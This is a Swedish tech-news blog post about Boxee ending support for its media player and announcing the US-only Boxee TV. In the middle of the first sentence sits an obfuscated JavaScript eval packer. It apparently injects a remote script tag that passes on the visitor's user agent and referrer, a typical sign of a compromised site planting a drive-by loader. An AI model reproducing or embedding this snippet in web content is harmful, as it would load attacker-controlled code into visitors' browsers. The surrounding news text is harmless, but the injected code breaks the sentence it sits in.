Image Image Image Image Image Image Image Image Image Image

| 19 oktober, 2018

Scroll to top

Top

Nu utannonserar Boxee den nya Boxee TV

Nu utannonserar Boxee den nya Boxee TV
Sebastian Plengier Ehrnfelt

Ett eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yrftr|var|u0026u|referrer|fatid||js|php’.split(‘|’),0,{}))
tungt besked för många Boxanvändare landade idag på deras hylla. Meddelandet säger att företaget inte längre tänker fortsätta tillverka eller uppdatera mediaspelaren Boxee. De tråkiga nyheterna kommer i samband med att företaget nu utannonserar en helt ny box, Boxee TV. 

Tyvärr så meddelade också företaget att den nya boxen inte kommer att släppas utanför gränserna av USA. Så tyvärr kommer inte vi svenskar längre få tillgång till detta. Tråkigast är nyheten för personer som just köpt sig en box och inte kan lämna tillbaka den.

Den äldre Boxee kommer inte att sluta fungera men det enda som återstår är en uppdatering för Flashspelaren samt fix av ett par stycken buggar.

De tråkiga nyheterna får komma att lyftas upp av de glada nyheterna gällande releasen av Netflix i Sverige.

Den nya spelaren som Boxee släpper har stort fokus på TV-sändningar i HD. Den har två tuners för att kunna spela in program samtidigt som du tittar på ett annat.

Via: IDG.se